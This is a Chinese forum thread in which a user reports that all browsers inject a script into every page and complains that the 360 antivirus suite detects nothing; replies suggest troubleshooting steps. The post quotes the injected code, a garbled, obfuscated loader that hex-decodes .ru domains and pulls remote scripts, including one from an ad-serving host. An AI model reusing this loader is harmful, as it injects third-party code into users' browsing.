360 是在吃 SHI 吗?!!

2016-05-25 04:59:03 +08:00
 sky395

电脑中招了, 不管是 chrome 还是 firefox 还是 ie 打开所有的网页在<head>里都有一下代码: """ <html><head><script>!function(){var t=JSON.parse('["31747867353936342e7275","7877793673796d746d79637a772e7275"]'),e="26201",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=string.fromcharcode(parseint(t[o],16));return e},n="function(t,e,o){var" n="document.location.protocol+" "+t;if(window.smlo&amp;&amp;-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else""="" if(window.zsmlo&&-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var"="" r="document.createElement(" script");r.setAttribute("src",n),r.setAttribute("type","text="" javascript"),document.head.appendChild(r),r.onload="function(){this.a982392846||(this.a982392846=!0," function"="=typeof""" e&&e())},r.onerror="function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r)," function"="=typeof" "="" o&&o())}}},r="function(i){var" a="i?i:t[0],s=o(a)+" pjs="" "+e+".js";n(s,function(){},function(){var"="" e="t.indexOf(a),o=t[e+1];o&amp;&amp;r(o)})};r()}();function" getcfcookie(name)="" {="" var="" matches="document.cookie.match(new" regexp("(?:^|;="" )"="" +="" name.replace(="" ([\.$?*|{}\(\)\[\]\\\="" \+^])="" g,="" '\\$1')="" +="" "="([^;]*)" ));"="" return="" matches="" ?="" decodeuricomponent(matches[1])="" :="" undefined;}="" if="" (window.self="=" window.top)="" {="" document.addeventlistener("domcontentloaded",="" function(){="" var="" pops="document.createElement('script');" var="" cfiltercookie="6697e3d5eb75761c638fdeb1eed84055" ;="" var="" cfiltercookieisset="getCfCookie(cfilterCookie)" ?="" getcfcookie(cfiltercookie)="" :="" 0;="" pops.src="//&lt;a href=" http:="" <a="" href="http://contentprotector-us1.com" rel="nofollow">contentprotector-us1.com="" "="" rel="nofollow">contentprotector-us1.com/" +="" 'getcl="" rotator="" '="" +="" 'campaignid="" 1="" '="" +="" 'sourceid="" 109="" '="" +="" 'siteid="" 13138="" '="" +="" 'userid="" 07b57414-d0f4-4fd0-8e24-8ebc6e177c5a="" '="" +="" 'iscookie="" '="" +="" cfiltercookieisset;="" document.head.appendchild(pops);="" });}<="" script=""> <meta http-equiv="content-type" content="text/html;charset=utf-8">

404 Not Found </head> <body text="#000000" bgcolor="#ffffff">

Error: Not Found

The requested URL / was not found on this server.

</body></html> """ 导致打开所有网页都巨慢!! 手动检查开机启动项和浏览器插件没发现问题。

于是安装了大名鼎鼎的 360 全家桶。查了一晚上木马和病毒,结果报告说“电脑很安全”!! 我 xxxxx 。请问数字你在吃 SHI 吗? 还把我的电脑弄的更慢了! 现在发个帖子都卡的不行!现在感觉真是上贼船了!

小弟不想重装系统,求各位大神有什么高招吗? 谢过先

4917 次点击
所在节点    信息安全
19 条回复
casparchen
2016-05-25 05:12:39 +08:00
虽然很讨厌数字, 但是这个黑我给 0 分
cxbig
2016-05-25 05:17:55 +08:00
浏览器装的插件一个个关掉,看看是哪个插件插入的
sky395
2016-05-25 05:23:49 +08:00
@cxbig 所有插件都关了,还是被植入代码, 应该和插件没关系, 因为所有的游览器( chrome , firefox 和 ie )都有这个问题。 感觉像中木马了
binux
2016-05-25 05:31:38 +08:00
命令行拉个页面看看
cxbig
2016-05-25 05:32:10 +08:00
@sky395 确定不是插件,就进行第二步:随便打开几个 https 页面看看有没有这代码。这个可以简单确认不是静态内容被宽带供应商劫持。
sky395
2016-05-25 05:34:32 +08:00
@binux 命令行怎么搞? 求指教
sky395
2016-05-25 05:37:30 +08:00
@cxbig https 页面没有被插入代码。 肯定不是供应商劫持, 同台电脑其它系统没这问题。
binux
2016-05-25 05:39:52 +08:00
@sky395
`curl http://httpbin.org/html`

https 没有被插入代码,才更有可能是供应商劫持。。如果是插件, https 一样能插。。
sky395
2016-05-25 05:44:30 +08:00
@binux 我这是 win10 系统,没有 curl 命令呀。 应该不是供应商劫持, 同台电脑其它的 win10 系统没有这个问题。 这段代码的表现就是把所有页面里的关键字都变成广告链接。
sky395
2016-05-25 05:45:52 +08:00
很奇怪, 360 浏览器没有被劫持?
sky395
2016-05-25 05:51:58 +08:00
感觉应该是系统木马的劫持,可能是 360 浏览器不出名,导致没有被照顾到?
ThreeBody
2016-05-25 06:10:25 +08:00
还有可能是 winsocks 劫持,做一个系统还原点,然后使用
netsh winsock reset
重启后看看
hx1997
2016-05-25 07:04:58 +08:00
看看代理服务器?
anyclue
2016-05-25 09:39:28 +08:00
别用杀毒,用系统查杀里面的常规修复试试,系统急救箱呢?
cfans1993
2016-05-25 09:43:30 +08:00
楼主是不是安装了破解版游戏或激动工具
cfans1993
2016-05-25 09:44:00 +08:00
激活
rogeecn
2016-05-25 09:53:55 +08:00
问题都没定位到,就把 360 来黑~
zuoxiaomo
2016-05-25 09:58:26 +08:00
这个和 360 有毛线关系。。。
dxfree
2016-05-25 10:02:11 +08:00
电脑中招了去装 360 解决,也是够没水平的。。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/281060

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX